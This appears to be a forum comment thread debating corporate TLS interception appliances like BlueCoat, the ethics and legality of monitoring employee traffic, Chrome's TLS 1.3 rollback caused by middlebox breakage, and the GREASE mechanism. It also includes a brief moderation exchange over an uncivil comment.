The point is that preventing data exfiltration is not a trivial task, and if you're at all serious about it then the network containing the secrets is not connected to the internet. And if it's less serious than that then it can't justify a high-risk TLS MITM device.
And the A-Team could land on the roof with a helicopter in the middle of the night, take control of the building, breach the data center, and physically steal and leave with all the servers.
Yes, if one is determined enough, they will find a way to steal data.
> It isn't worth the security cost.
That's up for the company to decide... and apparently they have decided that it is worth the cost, regardless of what zrm, random person on the Internet, thinks.
Bad generalization - in many countries, it's illegal for your company to do content inspection.
There's a good argument that it's unethical too. There are many ways where your company has to trust you instead of pervasively monitoring your doings and communications, and this should fall in the same area.
Put it on the endpoint. You already need protection on the endpoint to protect against malware, etc and MITM solutions only cover assets on the internal network. What about company laptops?
Pretty much all the endpoint solutions MITM exactly the same way as the middle box by running as a proxy listening on localhost. They also pretty much universally do an even worse job than the network middleboxes on handling invalid certs and supporting modern tls, hard as that may be to believe. Then you have the added nightmare of ensuring a client on tens or hundreds of thousands of enpoints is fully patched and functioning correctly.
Most of the solutions I have seen for devices outside the corporate perimeter are some combination of enforced vpn and authenticated proxy that is internet accessible.
Endpoint-based MITM solutions tend to be even worse for security, since they have a larger attack surface (and generally seem to be really badly implemented). On the plus side, some things can be done locally without MITM.
From a privacy perspective, it doesn't really matter if the monitoring happens centralized or not.
In the cases where I've seen strict filtering laptops were forced through VPN connections to HQ, where the gateway then decides what parts of internal and external networks they are allowed to access.
I agree that this is how they see it, but it's a losing battle. There's no filter for people's minds, or for what they write down. The owner of a company cannot approach this problem from the perspective of technical bandaids; they absolutely must trust the right people, and only the right people.
If you're using your company's network, then they have every right to monitor all of the activity on it.
This is tantamount to steaming open and resealing the envelopes of all physical mail. Have some god damn ethics, I'd sooner quit than snoop traffic in this manner.
If the use of the MITM is public it is more like requiring you to leave outbound paper mail in an outbox without an envelope, then have the internal mail office archive it and add the envelope. Perfectly reasonable.
What you do while on work should not be personal and thus cannot be snooped upon.
If you need to send a personal paper letter, you would go to the post office, not send it using the company's stamps, right?
All MITM proxies I know require an enterprise CA trusted by the end-point. If that CA is on your machine the endpoint is probably owned by your employer. It is legal in most jurisdictions for your employer to monitor the usage of resources they have provided, be it computer or network.
I would never trust a company device, or company network, with anything I consider sensitive. Use your own device and keep it on cellular.
Also though I don't like it, employers in the US do have the right to open mail addressed to you personally if delivered to the office.
Legal and ethical aren't the same thing, though. I agree it's legal for your employer to monitor traffic on their network. But an ethical sysadmin would not facilitate their doing so (unless there were a fairly significant and unusual justification in context).
(Note: I would also never trust a company device or company network, and I keep my personal devices completely separate from the company network for this reason. But I consider this a workaround for a deplorable situation, rather than just the way things are.)
Personally I think that is too simplistic a position and the reality is more complex. Most people would agree that using this approach to spy on your employees to track their banking activity is unethical. Using MITM-SSL as a way to get visibility on certain APTs using products such as FireEye is controversial, but I don't personally believe to be unethical.
I would argue against such an approach if there are alternatives but if the organization's leaders were set on it I would engage with the process and make sure that it did not evolve into more unethical practices such as logging all traffic contents or the above banking example.
What law in the US makes it illegal to circumvent an encryption system? I can think of the DMCA's prohibitions against circumvention measures for DRM, but that's specific to protecting copyrighted works.
This FindLaw article http://employment.findlaw.com/workplace-privacy/privacy-in-t... agrees that employers have a right to monitor communications from their devices on their networks, especially when this policy has been clearly laid out and agreed to by employees. Expectation of privacy is a major deciding factor in US law.
I'm not sure of the legality of an ISP doing this. I would hope it's illegal, but ISPs are weirdly regulated compared to, say, phone companies.
This is legally required in some sectors for regulation purposes, notably finance. I think a lot of people who casually throw out this sentiment don't appreciate that aspect of it.
+1. I work in regulatory compliance at a financial firm. My current firm doesn't do this because we don't originate trades, but when I worked at a hedge fund, all forms of electronic communications were MITM'd & recorded for regulatory reasons (and to monitor for IP theft - we did sue a soon former employee after he emailed source for a quantitative model to his personal gmail) primarily to combat or defend against insider trading.
No. I've never worked for GS. In the case I'm talking about, the employee was sued 4 hours before he was fired. Federal criminal charges came a few months later.
It's my understanding that BlueCoat is used pretty heavily in some schools. Most of the students there don't have the option of "working" somewhere else.
Basic filtering can be done via passively inspecting SNI headers and terminating connections to verboten hosts. However, that's not enough for some orgs, and some software works around it: https://www.bamsoftware.com/papers/fronting/
At my workplace we need to use middleboxes like this for 2 reasons
-our commitment to our customers and regulatory compliance requires we know where customer data is at all times. It would be lovely if all employees could be trusted with data at all times, but the reality is some employees will steal information, as google found out with Levandowski. That's google's own information though; they don't have a regulatory requirement to report the breach, whereas the data I protect requires full disclosure legally.
-malware is increasingly using https to communicate with C&C. Many malware families now install a trusted root cert so they can exfiltrate data on less monitored 443 rather than 80. When (not if) devices get compromised we need to know what the attacker got.
I would love to not need to do this because it's a privacy mess and breaks applications all the time, but there simply are not better tools to serve as the last line of defence against data loss.
iOS has mostly solved this problem through a combination of not running unsigned code and APIs where MDM can draw a corporate data barrier inside the phone, but while desktop OSs remain there will need to be some form of this.
There are ways to filter content without breaking user privacy. For example, you could restrict access to the Internet altogether, and suggest that your users only get what they need from your internal corporate network. See how incredibly productive that makes your staff?
What these "enterprise environments" want is to leech off the Internet's knowledge while keeping a firm chokehold on the privacy of their own employees Sadly, it looks like Google is caving in to their pressure.
> Sadly, it looks like Google is finally caving in to their pressure. Maybe someone like Mozilla won't.
All browser vendors provide the necessary bits for properly implemented HTTPS MITM, and have done so for ages (which are fairly simple, basically "allow local trusted certificate roots and ignore key pinning for them").
> What these "enterprise environments" want is to leech off the Internet's knowledge while keeping a firm chokehold on the privacy of their own employees
Because one size really does fit all, and all environments have the same needs?
I MITM my own connections for filtering purposes. It turns out to be the most effective way of blocking and changing crap in not just my main browser (of which I use several), but those embedded in other apps, for phoning home or otherwise.
I do the same. I have experimented with various solutions. Currently using haproxy. This also fixes problems with clients that are, thankfully, not SNI-capable.
> "Enterprise class Blue Coat’s SSL Visibility Appliance is comprehensive, extensible solution that assures high-security encryption. While other vendors only support a handful of cipher-standards, the SSL Visibility Appliance provides timely and complete standards support, with over 70 cipher suites and key exchanges offered, and growing. Furthermore, unlike competitive offerings, this solution does not “downgrade” cryptography levels and weaken your organization’s security posture, putting it at greater risk. As the SSL/TLS standards evolve, so will the management and enforcement capabilities of the SSL Visibility Appliance."
It sounds like if you run a web server, you should think about only supporting TLS 1.3 with no downgrade support, to ensure security without the possibility of your visitors' being subject to interception by a third party (even if it is their own enterprise).
The second party in this instance is the organisation, including the user. The enterprise owns the pipe, the router, the endpoint device, the chair the user sits on, and the time being used by the employee while they are not on a break. They are a representative of the enterprise while they use a workplace computer, and while they do have an expectation of privacy on devices under certain circumstances, that is balanced with my need to protect the enterprise from bad actors. I am obliged to MitM the significant majority of SSL connections, but I do so after acquiring informed consent from the employee. This is via both workplace policy to which they must agree to remain employed, and via clickthrough notification on logon that SSL is intercepted and use is monitored. In exchange, I will only make use of information collected that is pertinent to such protection activities. For instance, if I see a Bookface post about a party at the weekend posted during a break, that is discarded. If a post is captured that is sending business-confidential information to a competitor, that is collected and used in a formal process.
If you break my ability to monitor the use of my devices, your product is dropped from my network. You'll also find that it is dropped from the entire education sector. That is why Chrome has backed off this change.
Many a head-scratching web application error investigation has resulted in an "a-ha" moment when you notice the `X-BlueCoat-Via` header in your logs. It does stuff like issuing GETs against URLs that only have POST handlers. It issues these random requests having procured its users' auth cookies even when the real user has since left the site.
There is a massive hypocrisy in browser vendors getting hysterical about self signed certs while letting MITM proxies operate with impunity or worse working with them.
Why isn't there an effort to detect MITM proxies and post equally scary warnings? Surely users have a right to know.
MITM is worse than self signed certs and if 'exceptions' can be found for MITM like corporate security, management etc then the same exceptions should be found for self signed certs for individuals rather than creating dependencies on CA 'authorities'. This just another instance of furthering corporate interests while sacrificing individuals.
How can a browser distinguish between a self-signed server certificate, and a MITM proxy presenting a self-signed server certificate?
The scary warnings for self-signed certificates are in fact a protection against MITM. It's because of them that MITM proxies are forced to install a CA certificate. The main difference is that installing a CA certificate requires explicit action in the browser (and on some newer systems displays scary warnings), while if a MITM proxy could simply present a fake self-signed certificate, it could easily intercept anyone. Therefore, self-signed certificates are strictly worse.
Because it does not rely on any 'authority'. The increasingly scary warnings by browser vendors is in stark contrast to zero interest in detecting MITMs and warning users. The next step could very well be the disabling the ability to add exceptions for self signed certs.
Why not promote content encryption or explore other ideas that do not rely on central authorities, and we can see there are always workaround for corporates but individuals are thrown under the bus.
I kinda hoped that TLS 1.3 had some magick in it so that those MITM proxies would no longer work because they can be recognized by the browser and the browser can say: how about no.
Also, wasn't there some security issues relating to the possibility to downgrade the encryption of a connection?
Wouldn't it be better to allow enterprises to do version pinning (which I believe used to be supported in chrome enterprise), rather than remove TLS 1.3 for everyone?
This is a good point. Google has added functionality so that user installed certificates bypass all certificate pinning utilities, so users using these tools are less protected. However, there is no indication of the network being monitored once the certificate has been installed.
On Android every time a user-installed certificate authority is used a warning is shown. Furthermore, the user is forced to set a lock screen the moment you install a certificate.
If Google can push this (frankly user unfriendly) UI through, why not change "Secure" into "Monitored" in Google Chrome? The green padlock is a lie and the truth is exposed only after inspecting the certificate using the web developer tools.
This is something the TLS spec authors have prepared against with GREASE. The idea is the client adds some junk version information to its list of supported protocols. To quote: "Correct server implementations will ignore these values and interoperate. Servers that do not tolerate unknown values will fail to interoperate with existing clients, revealing the mistake before it is widespread."
This dosent really seem to solve anything, everyone now ignores the enumerated GREASE values as they are reserved upfront, and will continue to cause failures with other extended values. yay?
This at least means that the developer is aware that these parts of the spec are extensible, and by explicitly ignoring the GREASE values are explicitly choosing to potentially have a broken application in the future. This is a different class of problems than developers who weren't aware certain fields were extensible.
To explain the other answer a bit more: TLS upgrades have always been opt-in. The problem is that you have to be very clever where you put that option, or some (expensive and popular and dumb) webservers and middleboxes will just freak out and block the client.
The obvious place is the TLS version number in the handshake. It can say "I support up to TLS 1.3" and the other side can say "I support up to TLS 1.2" and the obvious choice is 1.2. But again, some webservers and middleboxes, as soon as they see 1.3 there, they freak out, block the connection completely.
Another idea for where to put it is in the candidate ciphers list - a "oh and I support TLS 1.3" pseudo-"cipher". The other side is supposed to just not use it if it's not recognized. Bug again, some stuff out there just freaks out.
Why do they freak out? Sometimes it's because someone thought that any unrecognized bit could be a hacking attempt. Sometimes it's because the software starts as a pile of bugs and is just debugged to the point that it mostly works today (and at that time "1.3" was never seen at exactly that spot).
So the goal of "GREASE" is to put random not-enumerated values in places like the ciphers list. Once a server or middlebox is compatible with GREASE, it'll be compatible with any future optional upgrade signal being present in those parts of the TLS handshake.
(I'm not sure where GREASE has been implemented so far, and I'm not sure if TLS 1.3 is 100% finalized yet.)
I wasn't clear, but I meant "opt-in" in the sense that it would be enabled on the client by optional configuration, with big warnings for users on "corporate networks". This would draw attention to the issue, because every time a version bumped the web would be flooded with "be sure and opt in to the TLS upgrade, unless you're on a shitty BlueCoat network!" advice. Eventually BlueCoat would get the message.
I understand that proper network hosts will negotiate TLS versions rather than "freaking out".
Browsers should add a button which allow being proxied, combined with a campaign to educate people on the difference.
I think its reasonable for a company to want to filter everything that comes through their pipe, if anything, it's a bit of a liability not to do it, but at the same time, non-technical people should understand that their connection is being unencrypted and re-encrypted, and be educated on the consequences.
There are a few local coffee shops which terminate SSL, and when people see me closing my browser and laptop, or starting to tether through my phone because of the cert error they tell me "oh, you just need to accept all those certs!".
We've banned this account. National slurs are not welcome here. Also, you've posted many uncivil and/or unsubstantive comments. That makes this site worse and is not allowed (and we warned you repeatedly).
You're reading something that isn't there. Russians are like the whitest people on earth. South Korea and Singapore aren't "shitholes" by any measure. However, by their BlueCoat use, they are "wannabe shitholes".
I clicked through to find you are "antifa". Didn't you get the memo? You can't be seen to defend Russia in any way!
While russians are, yeah, pretty white, that still reads as pretty racist. wannabe shitholes is....kinda not a good look. just sayin.
EDIT: also worth pointing out, Russia is literally the only country listed that has a "white" population. So, yeah, downvote all ya'll want, that was a racist( or trolling) comment.
you're totally right on that last point though. ;)
In this case, it doesn't sound like they're reverting it because of overall breakage, but rather because it breaks the tool that would otherwise be used to control TLS 1.3 trials and other configuration. Firefox had a similar issue, where they temporarily used more conservative settings for their updater than for the browser itself, to ensure that people could always obtain updates that might improve the situation.